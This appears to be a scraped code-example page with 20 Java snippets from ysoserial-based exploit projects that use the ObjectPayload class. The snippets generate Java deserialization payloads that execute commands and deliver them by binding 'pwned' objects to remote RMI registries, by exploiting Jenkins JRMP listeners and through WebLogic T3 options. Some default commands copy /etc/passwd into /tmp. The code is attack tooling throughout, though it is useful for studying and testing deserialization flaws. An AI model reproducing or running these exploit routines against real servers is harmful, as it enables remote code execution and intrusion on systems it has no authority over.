This article collects typical usage examples of the Java class ysoserial.payloads.ObjectPayload, for readers looking for how the ObjectPayload class is used in practice.
The ObjectPayload class belongs to the ysoserial.payloads package. A total of 20 code examples of the class are shown below, sorted by popularity by default.
Example 1: printUsage
import ysoserial.payloads.ObjectPayload; // import the required package/class
private static void printUsage() {
    System.err.println("Y SO SERIAL?");
    System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
    System.err.println(" Available payload types:");
    final List<Class<? extends ObjectPayload>> payloadClasses =
        new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
    Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize
    final List<String[]> rows = new LinkedList<String[]>();
    rows.add(new String[] {"Payload", "Authors", "Dependencies"});
    rows.add(new String[] {"-------", "-------", "------------"});
    for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
        rows.add(new String[] {
            payloadClass.getSimpleName(),
            Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
            Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
        });
    }
    final List<String> lines = Strings.formatTable(rows);
    for (String line : lines) {
        System.err.println(" " + line);
    }
}
Developer ID: hucheat, Project: APacheSynapseSimplePOC, Lines of code: 27, Source file: GeneratePayload.java
Example 2: exploit
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void exploit(final Registry registry,
        final Class<? extends ObjectPayload> payloadClass,
        final String command) throws Exception {
    new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
        ObjectPayload payloadObj = payloadClass.newInstance();
        Object payload = payloadObj.getObject(command);
        String name = "pwned" + System.nanoTime();
        Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
        try {
            registry.bind(name, remote);
        } catch (Throwable e) {
            e.printStackTrace();
        }
        Utils.releasePayload(payloadObj, payload);
        return null;
    }});
}
Developer ID: hucheat, Project: APacheSynapseSimplePOC, Lines of code: 18, Source file: RMIRegistryExploit.java
Example 3: run
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    // ensure payload generation doesn't throw an exception
    byte[] serialized = new ExecCheckingSecurityManager().callWrapped(new Callable<byte[]>(){
        public byte[] call() throws Exception {
            final String command = args.length > 0 && args[0] != null ? args[0] : getDefaultTestCmd();
            System.out.println("generating payload object(s) for command: '" + command + "'");
            ObjectPayload<?> payload = clazz.newInstance();
            final Object objBefore = payload.getObject(command);
            System.out.println("serializing payload");
            byte[] ser = Serializer.serialize(objBefore);
            Utils.releasePayload(payload, objBefore);
            return ser;
        }});
    try {
        System.out.println("deserializing payload");
        final Object objAfter = Deserializer.deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
Developer ID: hucheat, Project: APacheSynapseSimplePOC, Lines of code: 26, Source file: PayloadRunner.java
Example 4: exploit
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void exploit(final Registry registry,
        final Class<? extends ObjectPayload> payloadClass,
        final String command) throws Exception {
    new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
        ObjectPayload payloadObj = payloadClass.newInstance();
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper("none", command);
        Object payload = payloadObj.getObject(cmdHelper);
        String name = "pwned" + System.nanoTime();
        Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
        try {
            registry.bind(name, remote);
        } catch (Throwable e) {
            e.printStackTrace();
        }
        Utils.releasePayload(payloadObj, payload);
        return null;
    }});
}
Developer ID: pimps, Project: ysoserial-modified, Lines of code: 19, Source file: RMIRegistryExploit.java
Example 5: exploit
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void exploit(final Registry registry,
        final Class<? extends ObjectPayload> payloadClass,
        final String command) throws Exception {
    new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
        ObjectPayload payloadObj = payloadClass.newInstance();
        Object payload = payloadObj.getObject(command);
        String name = "pwned" + System.nanoTime();
        Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
        try {
            registry.bind(name, remote);
        } catch (Throwable e) {
            e.printStackTrace();
        }
        Utils.releasePayload(payloadObj, payload);
        return null;
    }});
}
Developer ID: RickGray, Project: ysoserial-plus, Lines of code: 18, Source file: RMIRegistryExploit.java
Example 6: run
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    // ensure payload generation doesn't throw an exception
    byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
        public byte[] call() throws Exception {
            final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
            System.out.println("generating payload object(s) for command: '" + command + "'");
            ObjectPayload<?> payload = clazz.newInstance();
            final Object objBefore = payload.getObject(command);
            System.out.println("serializing payload");
            byte[] ser = Serializer.serialize(objBefore);
            Utils.releasePayload(payload, objBefore);
            return ser;
        }});
    try {
        System.out.println("deserializing payload");
        final Object objAfter = Deserializer.deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
Developer ID: RickGray, Project: ysoserial-plus, Lines of code: 26, Source file: PayloadRunner.java
Example 7: getExploitPayload
import ysoserial.payloads.ObjectPayload; // import the required package/class
private static byte[] getExploitPayload(String payloadType, String command){
    final Class<? extends ObjectPayload> payloadClass = ObjectPayload.Utils.getPayloadClass(payloadType.split(" ")[0]);
    byte[] exploitPayload = new byte[0];
    try {
        final ObjectPayload payload = payloadClass.newInstance();
        final Object object = payload.getObject(command);
        exploitPayload = Serializer.serialize(object);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
    }
    return exploitPayload;
}
Developer ID: NetSPI, Project: JavaSerialKiller, Lines of code: 19, Source file: Utilities.java
Example 8: run
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    // ensure payload generation doesn't throw an exception
    byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
        public byte[] call() throws Exception {
            final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
            System.out.println("generating payload object(s) for command: '" + command + "'");
            final Object objBefore = clazz.newInstance().getObject(command);
            System.out.println("serializing payload");
            return Serializer.serialize(objBefore);
        }});
    try {
        System.out.println("deserializing payload");
        final Object objAfter = Deserializer.deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
Developer ID: NetSPI, Project: JavaSerialKiller, Lines of code: 24, Source file: PayloadRunner.java
Example 9: generate
import ysoserial.payloads.ObjectPayload; // import the required package/class
public Object generate(String type, String command) {
    final Class<? extends ObjectPayload> payloadClass = getPayloadClass(type);
    try {
        ObjectPayload payload = payloadClass.newInstance();
        Object object = payload.getObject(command);
        return object;
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload.");
        e.printStackTrace();
        System.exit(1);
        return null;
    }
}
Developer ID: njfox, Project: Java-Deserialization-Exploit, Lines of code: 17, Source file: GeneratePayload.java
Example 10: run
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    // ensure payload generation doesn't throw an exception
    byte[] serialized = ExecBlockingSecurityManager.wrap(new Callable<byte[]>(){
        public byte[] call() throws Exception {
            final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
            System.out.println("generating payload object(s) for command: '" + command + "'");
            final Object objBefore = clazz.newInstance().getObject(command);
            System.out.println("serializing payload");
            return serialize(objBefore);
        }});
    try {
        System.out.println("deserializing payload");
        final Object objAfter = deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
Developer ID: njfox, Project: Java-Deserialization-Exploit, Lines of code: 24, Source file: PayloadRunner.java
Example 11: main
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void main(final String[] args) {
    if (args.length != 2) {
        printUsage();
        System.exit(USAGE_CODE);
    }
    final String payloadType = args[0];
    final String command = args[1];
    final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
    if (payloadClass == null) {
        System.err.println("Invalid payload type '" + payloadType + "'");
        printUsage();
        System.exit(USAGE_CODE);
        return; // make null analysis happy
    }
    try {
        final ObjectPayload payload = payloadClass.newInstance();
        final Object object = payload.getObject(command);
        PrintStream out = System.out;
        Serializer.serialize(object, out);
        ObjectPayload.Utils.releasePayload(payload, object);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
        System.exit(INTERNAL_ERROR_CODE);
    }
    System.exit(0);
}
Developer ID: hucheat, Project: APacheSynapseSimplePOC, Lines of code: 30, Source file: GeneratePayload.java
Example 12: parseObjIdAndExploit
import ysoserial.payloads.ObjectPayload; // import the required package/class
private static void parseObjIdAndExploit ( final String[] args, final Class<? extends ObjectPayload> payloadClass, int jrmpPort,
        InetSocketAddress isa, Exception e ) throws Exception, IOException {
    String msg = e.getMessage();
    int start = msg.indexOf("objID:[");
    if ( start < 0 ) {
        throw new Exception("Failed to get object id");
    }
    int sep = msg.indexOf(", ", start + 1);
    if ( sep < 0 ) {
        throw new Exception("Failed to get object id, separator");
    }
    int end = msg.indexOf("]", sep + 1);
    if ( end < 0 ) {
        throw new Exception("Failed to get object id, separator");
    }
    String uid = msg.substring(start + 7, sep);
    String objNum = msg.substring(sep + 2, end);
    System.err.println("* UID is " + uid);
    System.err.println("* ObjNum is " + objNum);
    String[] parts = uid.split(":");
    long obj = Long.parseLong(objNum);
    int o1 = Integer.parseInt(parts[ 0 ], 16);
    long o2 = Long.parseLong(parts[ 1 ], 16);
    short o3 = Short.parseShort(parts[ 2 ], 16);
    exploit(new InetSocketAddress(isa.getAddress(), jrmpPort), obj, o1, o2, o3, payloadClass, args[ 2 ]);
}
Developer ID: hucheat, Project: APacheSynapseSimplePOC, Lines of code: 36, Source file: JenkinsListener.java
Example 13: main
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void main(final String[] args) throws Exception {
    final String host = args[0];
    final int port = Integer.parseInt(args[1]);
    final String command = args[3];
    final Registry registry = LocateRegistry.getRegistry(host, port);
    final String className = CommonsCollections1.class.getPackage().getName() + "." + args[2];
    final Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
    // ensure payload doesn't detonate during construction or deserialization
    exploit(registry, payloadClass, command);
}
Developer ID: hucheat, Project: APacheSynapseSimplePOC, Lines of code: 12, Source file: RMIRegistryExploit.java
Example 14: main
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void main(final String[] args) {
    if (args.length != 3) {
        printUsage();
        System.exit(USAGE_CODE);
    }
    final String payloadType = args[0];
    final String terminalType = args[1];
    final String command = args[2];
    final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
    if (payloadClass == null) {
        System.err.println("Invalid payload type '" + payloadType + "'");
        printUsage();
        System.exit(USAGE_CODE);
        return; // make null analysis happy
    }
    if (!terminalTypes.contains(terminalType)) {
        System.err.println("Invalid terminal type '" + terminalType + "'");
        printUsage();
        System.exit(USAGE_CODE);
        return; // make null analysis happy
    }
    try {
        final ObjectPayload payload = payloadClass.newInstance();
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
        final Object object = payload.getObject(cmdHelper);
        PrintStream out = System.out;
        Serializer.serialize(object, out);
        ObjectPayload.Utils.releasePayload(payload, object);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
        System.exit(INTERNAL_ERROR_CODE);
    }
    System.exit(0);
}
Developer ID: pimps, Project: ysoserial-modified, Lines of code: 39, Source file: GeneratePayload.java
Example 15: printUsage
import ysoserial.payloads.ObjectPayload; // import the required package/class
private static void printUsage() {
    System.err.println("Y SO SERIAL?");
    System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] [terminal type: cmd / bash / powershell / none] '[command to execute]'");
    System.err.println(" ex: java -jar ysoserial-[version]-all.jar CommonsCollections5 bash 'touch /tmp/ysoserial'");
    System.err.println("\tAvailable payload types:");
    final List<Class<? extends ObjectPayload>> payloadClasses =
        new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
    Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
    for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
        System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
    }
}
Developer ID: pimps, Project: ysoserial-modified, Lines of code: 13, Source file: GeneratePayload.java
Example 16: run
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
    // ensure payload generation doesn't throw an exception
    byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
        public byte[] call() throws Exception {
            final String command = args.length > 0 && args[0] != null ? args[0] : "cat /etc/passwd > /tmp/seraquefunfou";
            System.out.println("generating payload object(s) for command: '" + command + "'");
            CmdExecuteHelper cmdHelper = new CmdExecuteHelper("bash", command);
            ObjectPayload<?> payload = clazz.newInstance();
            final Object objBefore = payload.getObject(cmdHelper);
            System.out.println("serializing payload");
            byte[] ser = Serializer.serialize(objBefore);
            Utils.releasePayload(payload, objBefore);
            return ser;
        }});
    try {
        System.out.println("deserializing payload");
        final Object objAfter = Deserializer.deserialize(serialized);
    } catch (Exception e) {
        e.printStackTrace();
    }
}
Developer ID: pimps, Project: ysoserial-modified, Lines of code: 28, Source file: PayloadRunner.java
Example 17: usage
import ysoserial.payloads.ObjectPayload; // import the required package/class
private static void usage() {
    System.err.println("Usage: WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMD");
    System.err.println("\nOptions:");
    System.err.println("\t--help\t\t\t\tprint usage (you\'re lookin at it)\n");
    System.err.println("\t--verbose\t\t\tVerbose output (full thrown exception output)\n");
    System.err.println("\t--method=EXPLOIT_METHOD\t\tExploit Method for delivering generated ysoserial payload");
    System.err.println("\t\tExploit Methods:\n\t\t\tProperty\tSend ysoserial payload as connection environment property value (Default, via javax.naming.Context.lookup(), similar to JavaUnserializeExploits weblogic.py)");
    System.err.println("\t\t\tBind\t\tSend ysoserial payload as object to bind to name (via javax.naming.Context.bind(), also similar to JavaUnserializeExploits weblogic.py)");
    System.err.println("\t\t\tWLBind\t\tSend ysoserial payload as WebLogic RMI object to bind to name (via weblogic.rmi.Naming.bind(), similar to ysoserial.exploit.RMIRegistryExploit)\n");
    System.err.println("\t--t3s[=PROTOCOL]\t\tUse T3S (transport-encrypted) connection (Disabled by default)");
    System.err.println("\t\tProtocols:\n\t\t\tTLSv1.2\n\t\t\tTLSv1.1\n\t\t\tTLSv1 (Default)\n\t\t\tSSLv3");
    System.err.println("\t\t\tSSLv2 (SSLv2Hello handshake only, then fallback to SSLv3 for communication: this is an Oracle Java limitation, not a tool limitation)\n\n");
    //list available ysoserial payload types, or print error on failure
    System.err.println("Available Payload Types (WebLogic is usually vulnerable to \"CommonsCollectionsX\" types):");
    try {
        final List<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
        Collections.sort(payloadClasses, new Strings.ToStringComparator());
        for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
            System.err.println("\t"+payloadClass.getSimpleName());
        }
        System.err.println("");
    } catch(NoClassDefFoundError ncdfe) {
        System.err.println("\tNo ysoserial object payload classes found! Ensure that ysoserial jar file is in classpath when executing WLT3Serial!\n");
    } catch(Exception e) {
        System.err.println("\tUnknown Error occurred while listing ysoserial object payload classes ("+e.getClass().getName()+")!");
    }
}
Developer ID: Bort-Millipede, Project: WLT3Serial, Lines of code: 29, Source file: WLT3Serial.java
Example 18: printUsage
import ysoserial.payloads.ObjectPayload; // import the required package/class
private static void printUsage() {
    System.err.println("Y SO SERIAL?");
    System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
    System.err.println("\tAvailable payload types:");
    final List<Class<? extends ObjectPayload>> payloadClasses =
        new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
    Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
    for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
        System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
    }
}
Developer ID: RickGray, Project: ysoserial-plus, Lines of code: 12, Source file: GeneratePayload.java
Example 19: main
import ysoserial.payloads.ObjectPayload; // import the required package/class
public static void main(final String[] args) {
    if (args.length != 2) {
        printUsage();
        System.exit(USAGE_CODE);
    }
    final String payloadType = args[0];
    final String command = args[1];
    final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
    if (payloadClass == null) {
        System.err.println("Invalid payload type '" + payloadType + "'");
        printUsage();
        System.exit(USAGE_CODE);
    }
    try {
        final ObjectPayload payload = payloadClass.newInstance();
        final Object object = payload.getObject(command);
        PrintStream out = System.out;
        Serializer.serialize(object, out);
    } catch (Throwable e) {
        System.err.println("Error while generating or serializing payload");
        e.printStackTrace();
        System.exit(INTERNAL_ERROR_CODE);
    }
    System.exit(0);
}
Developer ID: NetSPI, Project: JavaSerialKiller, Lines of code: 28, Source file: GeneratePayload.java
Example 20: getPayloadClass
import ysoserial.payloads.ObjectPayload; // import the required package/class
@SuppressWarnings("unchecked")
private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
    try {
        return (Class<? extends ObjectPayload>) Class.forName(className);
    } catch (Exception e1) {
    }
    try {
        return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName()
            + ".payloads." + className);
    } catch (Exception e2) {
    }
    return null;
}
Developer ID: njfox, Project: Java-Deserialization-Exploit, Lines of code: 14, Source file: GeneratePayload.java
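Note: The ysoserial.payloads.ObjectPayload class examples in this article were compiled from source code and documentation platforms such as Github/MSDocs. The code snippets were selected from open-source projects contributed by their respective developers, and copyright in the source code belongs to the original authors. For distribution and use, refer to the License of the corresponding project. Do not reproduce without permission.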